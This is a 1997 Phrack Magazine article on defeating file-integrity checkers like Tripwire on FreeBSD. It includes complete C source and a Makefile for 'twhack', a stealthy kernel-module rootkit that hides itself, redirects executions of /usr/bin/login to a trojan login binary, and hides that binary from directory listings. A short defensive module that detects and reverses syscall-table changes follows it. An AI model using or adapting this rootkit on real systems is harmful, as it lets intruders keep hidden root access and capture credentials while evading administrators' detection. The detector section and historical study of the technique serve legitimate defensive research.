| ---[ Phrack Magazine Volume 7, Issue 51 September 01, 1997, article 09 of 17 |
|
|
|
|
| -------------------------[ Bypassing Integrity Checking Systems |
|
|
|
|
| --------[ halflife <halflife@infonexus.com> |
|
|
|
|
| In this day and age where intrusions happen on a daily basis and there is a |
| version of "rootkit" for every operating system imaginable, even mostly |
| incompetent system administration staff have begun doing checksums on their |
| binaries. For the hacker community, this is a major problem since their very |
| clever trojan programs are quickly detected and removed. Tripwire is a very |
| popular and free utility to do integrity checking on UNIX systems. This |
| article explores a simple method for bypassing checks done by tripwire and |
| other integrity checking programs. |
|
|
| First off, how do integrity-checking programs work? Well, when you first |
| install them, they calculate a hash (sometimes multiple hashes) of all the |
| binary files you wish to monitor. Then, periodically, you run the checker |
| and it compares the current hash with the previously recorded hash. If the |
| two differ, than something funny is going on, and it is noted. Several |
| different algorithms exist for doing the hashes, the most popular probably |
| being the MD5 hash. |
|
|
| In the past, there have been problems with several hashes. MD5 has had some |
| collisions, as have many other secure hash algorithms. However, exploiting the |
| collisions is still very very difficult. The code in this article does not |
| rely on the use of a specific algorithm, rather we focus on a problem of trust |
| -- integrity checking programs need to trust the operating system, and some |
| may even trust libc. In code that is designed to detect compromises that |
| would by their very nature require root access, you can not trust anything, |
| including your own operating system. |
|
|
| The design of twhack had several requirements. The first is that it need not |
| require a kernel rebuild; loadable kernel modules (lkm) provided a solution |
| to this. The second is that it need be relatively stealthy. I managed to find |
| a simple way to hide the lkm in the FreeBSD kernel (probably works in OpenBSD |
| and NetBSD although I have not verified this). Once you load the module, the |
| first ls type command will effectively hide the module from view. Once hidden |
| it can not be unloaded or seen with the modunload(8) command. |
|
|
| First, a little information on FreeBSD loadable modules. I am using the MISC |
| style of modules, which is basically similar to linux modules. It gives you |
| pretty much full access to everything. LKM info is stored in an array of |
| structures. In FreeBSD 2.2.1 the array has room for 20 modules. |
|
|
| Hiding the modules is really quite simple. There is a used variable that |
| determines if the module slot is free or not. When you insert a module, the |
| device driver looks for the first free module entry -- free being defined as |
| an entry with 0 in the used slot and places some info in the structure. The |
| info is mainly used for unloading, and we are not interested in that, so it is |
| okay if other modules overwrite our structure (some might call that a feature, |
| even). |
|
|
| Next we have to redirect the system calls we are interested in. This is |
| somewhat similar to Linux modules as well. System calls are stored in an |
| array of structures. The structure contains a pointer to the system call and |
| a variable specifying the number of arguments. Obviously, all we are |
| interested in is the pointer. First we bcopy the structure to a variable, |
| then we modify the function pointer to point to our code. In our code we can |
| do stuff like old_function.sy_call(arguments) to call the original system call |
| -- quick and painless. |
|
|
| Now that we know HOW to redirect system calls, which ones do we redirect in |
| order to bypass integrity checkers? Well, there are a number of possibilities. |
| You could redirect open(), stat(), and a bunch of others so that reads of your |
| modified program redirect to copies of the unmodified version. I, however, |
| chose the opposite approach. Execution attempts of login redirect to another |
| program, opens still go to the real login program. Since we don't want our |
| alternative login program being detected, I also modified getdirentries so |
| that our program is never in the buffer it returns. Similar things probably |
| should have been done with syscall 156 which is old getdirentries, but I don't |
| think it is defined and I don't know of anything using it, so it probably does |
| not really matter. |
|
|
| Despite the attempts at keeping hidden, there are a few ways to detect this |
| code. One of the ways of detecting (and stopping) the code is provided. |
| It is a simple stealthy module that logs when syscall addresses change, and |
| reverses the changes. This will stop the twhack module as provided, but is |
| FAR from perfect. |
|
|
| What the checking code does is bcopy() the entire sysent array into a local |
| copy. Then it registers an at_fork() handler and in the handler it checks |
| the current system call table against the one in memory, if they differ it |
| logs the differences and changes the entry back. |
|
|
| <++> twhack/Makefile |
| CC=gcc |
| LD=ld |
| RM=rm |
| CFLAGS=-O -DKERNEL -DACTUALLY_LKM_NOT_KERNEL $(RST) |
| LDFLAGS=-r |
| RST=-DRESTORE_SYSCALLS |
|
|
| all: twhack syscheck |
|
|
| twhack: |
| $(CC) $(CFLAGS) -c twhack.c |
| $(LD) $(LDFLAGS) -o twhack_mod.o twhack.o |
| @$(RM) twhack.o |
|
|
| syscheck: |
| $(CC) $(CFLAGS) -c syscheck.c |
| $(LD) $(LDFLAGS) -o syscheck_mod.o syscheck.o |
| @$(RM) syscheck.o |
| clean: |
| $(RM) -f *.o |
| <--> |
| <++> twhack/twhack.c |
| /* |
| ** This code is a simple example of bypassing Integrity checking |
| ** systems in FreeBSD 2.2. It has been tested in 2.2.1, and |
| ** believed to work (although not tested) in 3.0. |
| ** |
| ** Halflife <halflife@infonexus.com> |
| */ |
|
|
| /* change these */ |
| #define ALT_LOGIN_PATH "/tmp/foobar" |
| #define ALT_LOGIN_BASE "foobar" |
|
|
| /* includes */ |
| #include <sys/param.h> |
| #include <sys/ioctl.h> |
| #include <sys/proc.h> |
| #include <sys/systm.h> |
| #include <sys/sysproto.h> |
| #include <sys/conf.h> |
| #include <sys/mount.h> |
| #include <sys/exec.h> |
| #include <sys/sysent.h> |
| #include <sys/lkm.h> |
| #include <a.out.h> |
| #include <sys/file.h> |
| #include <sys/errno.h> |
| #include <sys/syscall.h> |
| #include <sys/dirent.h> |
|
|
| /* storage for original execve and getdirentries syscall entries */ |
| static struct sysent old_execve; |
| static struct sysent old_getdirentries; |
|
|
| /* prototypes for new execve and getdirentries functions */ |
| int new_execve __P((struct proc *p, void *uap, int retval[])); |
| int new_getdirentries __P((struct proc *p, void *uap, int retval[])); |
|
|
| /* flag used for the stealth stuff */ |
| static int hid=0; |
|
|
| /* table we need for the stealth stuff */ |
| static struct lkm_table *table; |
|
|
| /* misc lkm */ |
| MOD_MISC(twhack); |
|
|
| /* |
| ** this code is called when we load or unload the module. unload is |
| ** only possible if we initialize hid to 1 |
| */ |
| static int |
| twhack_load(struct lkm_table *l, int cmd) |
| { |
| int err = 0; |
| switch(cmd) |
| { |
| /* |
| ** save execve and getdirentries system call entries |
| ** and point function pointers to our code |
| */ |
| case LKM_E_LOAD: |
| if(lkmexists(l)) |
| return(EEXIST); |
| bcopy(&sysent[SYS_execve], &old_execve, sizeof(struct sysent)); |
| sysent[SYS_execve].sy_call = new_execve; |
| bcopy(&sysent[SYS_getdirentries], &old_getdirentries, sizeof(struct sysent)); |
| sysent[SYS_getdirentries].sy_call = new_getdirentries; |
| table = l; |
| break; |
| /* restore syscall entries to their original condition */ |
| case LKM_E_UNLOAD: |
| bcopy(&old_execve, &sysent[SYS_execve], sizeof(struct sysent)); |
| bcopy(&old_getdirentries, &sysent[SYS_getdirentries], sizeof(struct sysent)); |
| break; |
| default: |
| err = EINVAL; |
| break; |
| } |
| return(err); |
| } |
|
|
| /* entry point to the module */ |
| int |
| twhack_mod(struct lkm_table *l, int cmd, int ver) |
| { |
| DISPATCH(l, cmd, ver, twhack_load, twhack_load, lkm_nullcmd); |
| } |
|
|
| /* |
| ** execve is simple, if they attempt to execute /usr/bin/login |
| ** we change fname to ALT_LOGIN_PATH and then call the old execve |
| ** system call. |
| */ |
| int |
| new_execve(struct proc *p, void *uap, int *retval) |
| { |
| struct execve_args *u=uap; |
|
|
| if(!strcmp(u->fname, "/usr/bin/login")) |
| strcpy(u->fname, ALT_LOGIN_PATH); |
| return old_execve.sy_call(p, uap, retval); |
| } |
|
|
| /* |
| ** in getdirentries() we call the original syscall first |
| ** then nuke any occurance of ALT_LOGIN_BASE. ALT_LOGIN_PATH |
| ** and ALT_LOGIN_BASE should _always_ be modified and made |
| ** very obscure, perhaps with upper ascii characters. |
| */ |
| int |
| new_getdirentries(struct proc *p, void *uap, int *retval) |
| { |
| struct getdirentries_args *u=uap; |
| struct dirent *dep; |
| int nbytes; |
| int r,i; |
|
|
| /* if hid is not set, set the used flag to 0 */ |
| if(!hid) |
| { |
| table->used = 0; |
| hid++; |
| } |
| r = old_getdirentries.sy_call(p, uap, retval); |
| nbytes = *retval; |
| while(nbytes > 0) |
| { |
| dep = (struct dirent *)u->buf; |
| if(!strcmp(dep->d_name, ALT_LOGIN_BASE)) |
| { |
| i = nbytes - dep->d_reclen; |
| bcopy(u->buf+dep->d_reclen, u->buf, nbytes-dep->d_reclen); |
| *retval = i; |
| return r; |
| } |
| nbytes -= dep->d_reclen; |
| u->buf += dep->d_reclen; |
| } |
| return r; |
| } |
| <--> |
| <++> twhack/syscheck.c |
| #include <sys/param.h> |
| #include <sys/ioctl.h> |
| #include <sys/proc.h> |
| #include <sys/systm.h> |
| #include <sys/sysproto.h> |
| #include <sys/conf.h> |
| #include <sys/mount.h> |
| #include <sys/exec.h> |
| #include <sys/sysent.h> |
| #include <sys/lkm.h> |
| #include <a.out.h> |
| #include <sys/file.h> |
| #include <sys/errno.h> |
| #include <sys/syscall.h> |
| #include <sys/dirent.h> |
|
|
| static int hid=0; |
| static struct sysent table[SYS_MAXSYSCALL]; |
| static struct lkm_table *boo; |
| MOD_MISC(syscheck); |
| void check_sysent(struct proc *, struct proc *, int); |
|
|
| static int |
| syscheck_load(struct lkm_table *l, int cmd) |
| { |
| int err = 0; |
| switch(cmd) |
| { |
| case LKM_E_LOAD: |
| if(lkmexists(l)) |
| return(EEXIST); |
| bcopy(sysent, table, sizeof(struct sysent)*SYS_MAXSYSCALL); |
| boo=l; |
| at_fork(check_sysent); |
| break; |
| case LKM_E_UNLOAD: |
| rm_at_fork(check_sysent); |
| break; |
| default: |
| err = EINVAL; |
| break; |
| } |
| return(err); |
| } |
|
|
| int |
| syscheck_mod(struct lkm_table *l, int cmd, int ver) |
| { |
| DISPATCH(l, cmd, ver, syscheck_load, syscheck_load, lkm_nullcmd); |
| } |
|
|
| void |
| check_sysent(struct proc *parent, struct proc *child, int flags) |
| { |
| int i; |
| if(!hid) |
| { |
| boo->used = 0; |
| hid++; |
| } |
| for(i=0;i < SYS_MAXSYSCALL;i++) |
| { |
| if(sysent[i].sy_call != table[i].sy_call) |
| { |
| printf("system call %d has been modified (old: %p new: %p)\n", i, table[i].sy_call, sysent[i].sy_call); |
| #ifdef RESTORE_SYSCALLS |
| sysent[i].sy_call = table[i].sy_call; |
| #endif |
| } |
| } |
| } |
| <--> |
|
|
|
|
| ----[ EOF |
|
|
|
|